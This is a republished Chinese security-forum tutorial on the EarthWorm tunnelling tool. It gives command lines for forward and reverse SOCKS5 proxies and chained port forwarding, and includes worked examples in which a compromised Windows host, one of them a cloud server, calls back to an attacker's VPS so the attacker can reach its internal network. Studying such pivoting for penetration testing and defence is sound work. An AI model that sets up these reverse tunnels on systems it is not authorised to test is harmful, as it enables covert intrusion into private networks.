ICode9

精准搜索请尝试: 精确搜索
首页 > 互联网> 文章详细

内网穿透大杀器EarthWorm_白帽子技术/思路_i春秋社区

2018-11-02 10:09:54  阅读:167  来源: 互联网

标签:



0x00 前言
当你在内网渗透,并且拿下一台机器的权限时,你是不是觉得已经算是一次完整的渗透了?
不来一次内网漫游,渗透是不完整的,哈哈。



本文给大家推荐一款内网穿透神器EarthWorm,(简称EW)是一套轻量便携且功能强大的网络穿透工具,基于标准C开发,具有socks5代理、端口转发和端口映射三大功能。



它强在哪些方面呢?
1.可穿透复杂的内网环境。(这么说吧:我本地连着路由器开一个虚拟机,可以直接反弹到公网的云服务器上。)
2.以支持多平台间的转接通讯,Linux、Windows、MacOS、Arm-Linux均支持。
支持平台列表:(可跨平台反弹)
ew_for_Win.exe 适用各种Windows系统(X86指令集、X64指令集) Windows7、Windows XP
ew_for_Linux32 各常见Linux发行版 (X86 指令集 CPU) Ubuntu(X86)/BT5(X86)
ew_for_linux64 各常见Linux发行版 (X64 指令集 CPU) Ubuntu(X64)/Kali(X64)
ew_for_MacOSX64 MacOS系统发行版 (X64 指令集) 苹果PC电脑,苹果server
ew_for_Arm32 常见Arm-Linux系统 HTC New One(Arm-Android)/小米路由器(R1D)
ew_mipsel 常见Mips-Linux系统 (Mipsel指令集 CPU) 萤石硬盘录像机、小米mini路由器(R1CM)

3.png (44.43 KB, 下载次数: 14)

下载附件 保存到相册

2018-3-21 13:19 上传


0x01 使用方法

以下所有样例,如无特殊说明代理端口均为1080,服务均为SOCKSv5代理服务.
该工具共有 6 种命令格式(ssocksd、rcsocks、rssocks、lcx_slave、lcx_listen、lcx_tran)。
1.正向SOCKS v5服务器

[Shell] 纯文本查看 复制代码

$ ./ew -s ssocksd -l 1080


2. 反弹 SOCKS v5 服务器
这个操作具体分两步:
a) 先在一台具有公网 ip 的主机A上运行以下命令:

[Shell] 纯文本查看 复制代码

$ ./ew -s rcsocks -l 1080 -e 8888


b) 在目标主机B上启动 SOCKS v5 服务 并反弹到公网主机的 8888端口

[Shell] 纯文本查看 复制代码

$ ./ew -s rssocks -d 1.1.1.1 -e 8888


成功。
3. 多级级联
工具中自带的三条端口转发指令,它们的参数格式分别为:

[Shell] 纯文本查看 复制代码

1

2

3

$ ./ew -s lcx_listen -l 1080 -e 8888

$ ./ew -s lcx_tran -l 1080 -f 2.2.2.3 -g 9999

$ ./ew -s lcx_slave -d 1.1.1.1 -e 8888 -f 2.2.2.3 -g 9999

通过这些端口转发指令可以将处于网络深层的基于TCP的服务转发至根前,比如 SOCKS v5。
首先提供两个“二级级联”本地SOCKS测试样例:
a) lcx_tran 的用法

[Shell] 纯文本查看 复制代码

1

2

$ ./ew -s ssocksd -l 9999

$ ./ew -s lcx_tran -l 1080 -f 127.0.0.1 -g 9999

b) lcx_listen、lcx_slave 的用法

[Shell] 纯文本查看 复制代码

1

2

3

$ ./ew -s lcx_listen -l 1080 -e 8888

$ ./ew -s ssocksd -l 9999

$ ./ew -s lcx_slave -d 127.0.0.1 -e 8888 -f 127.0.0.1 -g 9999


再提供一个“三级级联”的本地SOCKS测试用例以供参考

[Shell] 纯文本查看 复制代码

1

2

3

4

$ ./ew -s rcsocks -l 1080 -e 8888

$ ./ew -s lcx_slave -d 127.0.0.1 -e 8888 -f 127.0.0.1 -g 9999

$ ./ew -s lcx_listen -l 9999 -e 7777

$ ./ew -s rssocks -d 127.0.0.1 -e 7777


数据流向: SOCKS v5 -> 1080 -> 8888 -> 9999 -> 7777 -> rssocks

0x02 实战测试(分为本地测试和公网IP测试)
一般最常用的就是上面的第二条:反弹 SOCKS v5 服务器。
使用实例1:
目标机器:

[Shell] 纯文本查看 复制代码

ew.exe -s rssocks -d 2.2.2.2 -e 888


(2.2.2.2为想要反弹到的机器)
攻击机器:

[Shell] 纯文本查看 复制代码

ew.exe -s rcsocks -l 1008 -e 888


(监听888端口,转发到1008端口)
测试环境:
在这里我直接用我的本机Win10作为目标机器,将虚拟机Win7作为攻击机器。
本机Win10 ip:192.168.62.1
Win7 ip:192.168.62.128





首先攻击机器win7运行命令:

[Shell] 纯文本查看 复制代码

ew_for_Win.exe -s rcsocks -l 1008 -e 888


接收888端口的数据并转发到1008端口。



此时正在监听。
目标机器Win10运行命令:

[Shell] 纯文本查看 复制代码

ew_for_Win.exe -s rssocks -d 192.168.62.128 -e 888




此时攻击机器会弹出连接成功的提示:




好了,到此Win10的SOCKS5代理就反弹到Win7攻击机上了。
只需要一个Socks5连接工具就可以连接到本地1008端口来代理访问了。
推荐工具SocksCap64。




在代理处配置127.0.0.1:1008
代理已连接。
使用实例2:
攻击者洛杉矶 Linux VPS :45.78.*.*
目标阿里云服务器 Win2008:47.93.*.*
攻击者Linux监听:

[Shell] 纯文本查看 复制代码

[root@centos6 ~]# ./ew_for_Linux32 -s rcsocks -l 1008 -e 888




目标阿里云服务器反弹:

[Shell] 纯文本查看 复制代码

ew_for_Win.exe -s rssocks -d 45.78.*.* -e 888




攻击机器监听出现:rssocks cmd_socket OK!
表示反弹成功。
0x03 工具下载
分别是EarthWorm和SocksCap64。

.keke_tieng{ border:1px solid #E3E3E3; background:#efefef; padding:5px;/* border-radius:10px; -moz-border-radius:10px; -webkit-border-radius:10px;*/ margin:15px auto; } .keke_tieng .tienegbox{ background:#fff; padding:15px;/*border-radius:10px; -moz-border-radius:10px; -webkit-border-radius:10px;*/} .keke_tieng .ngleft,.keke_tieng .ngright{ width:49%;} .keke_tieng .ngleft{ float:left;} .keke_tieng .ngright{ float:right} .keke_tieng .hd{ width:100%; float:left; margin:0px 0px 10px 0px;height:28px;overflow:hidden;} .keke_tieng .hd a{line-height:28px; height:28px;width:100%;margin-left:10px; font-size:16px;font-family:"Microsoft Yahei"; font-weight:bold} .keke_tieng .hd h2{color:#FFF;width:62px;margin:0px;text-align:center;line-height:28px; height:28px; float:left} .keke_tieng .ngleft .hd h2{background:url(source/plugin/keke_tieng/template/images/tbga.png) no-repeat right;} .keke_tieng .ngright .hd h2{background:url(source/plugin/keke_tieng/template/images/tbgb.png) no-repeat right;} .keke_tieng li{ width:100%; float:left; height:29px; overflow:hidden; line-height:29px; color:#fd6666;} .keke_tieng li span{ float:right; width:50px; font-size:14px; color:#999; line-height:29px; text-align:right; padding-right:5px;} .keke_tieng li a{height:29px; font-size:14px; font-family:"Microsoft Yahei"; line-height:29px;color:#333333} .keke_tieng li a.bk{margin-right:3px; color:#FF9966} .clear{ clear:both; } .exx_zan { width: 75px; margin: 40px auto 0; height: 75px; position: relative; clear: both; }.exx_zan a.zan:link, .exx_zan a.zan:visited { color: #fff; text-decoration: none; }.exx_zan a.zan { width: 75px; height: 75px; background: url(https://bbs.ichunqiu.com/source/plugin/exx_like/template/images/dianzan.png) no-repeat 0 0; display: block; }.exx_zan a.zan:hover{ background: url(https://bbs.ichunqiu.com/source/plugin/exx_like/template/images/dianzan.png) no-repeat -95px 0; } .exx_zan a.zan em { width: 75px; text-align: center; padding: 48px 0 0; display: block; color: #fff; font-size:12px; line-height:20px; } .pcb{margin-right:0}

标签:
来源: https://bbs.ichunqiu.com/thread-36219-1-2.html

专注分享技术,共同学习,共同进步。侵权联系[admin#icode9.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有